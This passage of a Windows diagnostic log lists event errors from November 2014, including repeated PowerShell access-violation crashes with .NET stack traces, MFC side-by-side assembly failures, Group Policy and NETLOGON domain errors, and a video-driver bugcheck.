   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()

Error: (11/04/2014 09:47:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.2.9200.16398, time stamp: 0x50338287
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0372f818
Faulting process id: 0x1e10
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3

Error: (11/04/2014 09:47:00 AM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()

Error: (11/04/2014 09:46:24 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (11/04/2014 09:46:24 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (11/04/2014 09:45:05 AM) (Source: Microsoft-Windows-WMI) (EventID: 10) (User: NT AUTHORITY)
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (11/04/2014 11:20:49 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain NUVT due to the following:
%%1311

This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.



ADDITIONAL INFO

If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.

Error: (11/04/2014 10:08:52 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/04/2014 10:07:37 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1058) (User: NUVT)
Description: The processing of Group Policy failed. Windows attempted to read the file \\nuvt.com\SysVol\nuvt.com\Policies\{9BB0F799-6A0C-44B0-842C-F242955AF0C8}\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
B) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.

Error: (11/04/2014 10:07:17 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1058) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows attempted to read the file \\nuvt.com\SysVol\nuvt.com\Policies\{9BB0F799-6A0C-44B0-842C-F242955AF0C8}\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
B) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.

Error: (11/04/2014 09:46:28 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/04/2014 09:45:03 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1058) (User: NUVT)
Description: The processing of Group Policy failed. Windows attempted to read the file \\nuvt.com\SysVol\nuvt.com\Policies\{9BB0F799-6A0C-44B0-842C-F242955AF0C8}\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
B) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.

Error: (11/04/2014 09:44:45 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1058) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows attempted to read the file \\nuvt.com\SysVol\nuvt.com\Policies\{9BB0F799-6A0C-44B0-842C-F242955AF0C8}\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
B) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.

Error: (11/04/2014 09:44:25 AM) (Source: BugCheck) (EventID: 1001) (User: )
Description: 0x00000116 (0xfffffa800f42e4e0, 0xfffff880053938c8, 0x0000000000000000, 0x0000000000000002)C:\Windows\MEMORY.DMP110414-31512-01

Error: (11/04/2014 09:44:24 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 9:42:17 AM on ‎11/‎4/‎2014 was unexpected.

Error: (11/04/2014 09:41:29 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}


Microsoft Office Sessions:
=========================
Error: (11/04/2014 10:08:17 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.762_none_0c178a139ee2a7ed\MFC80.DLL

Error: (11/04/2014 10:08:17 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.762_none_0c178a139ee2a7ed\MFC80.DLL

Error: (11/04/2014 10:07:27 AM) (Source: Microsoft-Windows-WMI) (EventID: 10) (User: NT AUTHORITY)
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/04/2014 09:49:00 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.2.9200.1639850338287unknown0.0.0.000000000c00000050358f818289401cff83e77adf8fcC:\Windows\syswow64\windowspowershell\v1.0\powershell.exeunknownb5b91a53-6431-11e4-912c-3417eb9816d4

Error: (11/04/2014 09:49:00 AM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
